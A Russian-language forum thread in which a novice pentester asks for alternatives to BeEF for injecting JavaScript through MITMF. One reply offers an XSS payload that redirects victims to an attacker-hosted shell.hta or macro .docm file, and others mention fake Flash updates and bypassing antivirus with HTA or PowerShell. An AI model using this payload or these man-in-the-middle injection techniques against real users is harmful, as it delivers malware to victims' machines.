Beef или не beef? Вот в чем вопрос.

Всем доброго времени суток.
Не так давно начал интересоваться пентестингом (да-да я шарю за модные словечки).
Покурил инфу про MITMF - всё замечательно.
Дошли руки до инжекта JS.
Побаловался с alert('Hola'); - тоже всё замечательно.
Само собой, захотелось инжектить что-то более-менее интересное.
Покурил информацию про Beef - оказался кал в блестящей обертке: хук еще попробуй заинжекти, думает долго, делает долго, работоспособность многих модулей огорчила.
В общем задумка то классная, а вот реализация ожиданий не оправдала.
Итого: интересуют какие-либо аналогичные фреймворки и, впрочем, любая информация / мысли по поводу инжектов через MITMF.
В сети информации минимум, начал читать книги по JS, научился модифицировать страницы посредством JS, но, думаю, потенциал у этой развлекухи бОльший.
Всем спасибо за внимание (многобукафф утомляют, знаю).
Надеюсь что кто-нибудь что-нибудь таки предложит. Тапки не кидать - своих достаточно.

 

Хочешь самый клевый пэйлоад для ХSS?!
Отвечу сразу: document.location.href = 'http://www.hacker.ru/shell.hta' или document.location.href = 'http://www.hacker.ru/file.docm'

 

И чем это закончится? Скачиванием шелла? А запускать его кто будет?

 

Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.

 

Спасибо. Пошел читать гугол.

 

При таком раскладе уже лучше beef юзать

 

Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.

 

Я еще в топике написал что я полный ноль. Я сразу сказал что НЕ обладаю знанием дела. Потому и начал спрашивать. Ты в меня кинул 3 буквы hta и я пошел с ними в гугол. Интересно, ты чего ожидал?)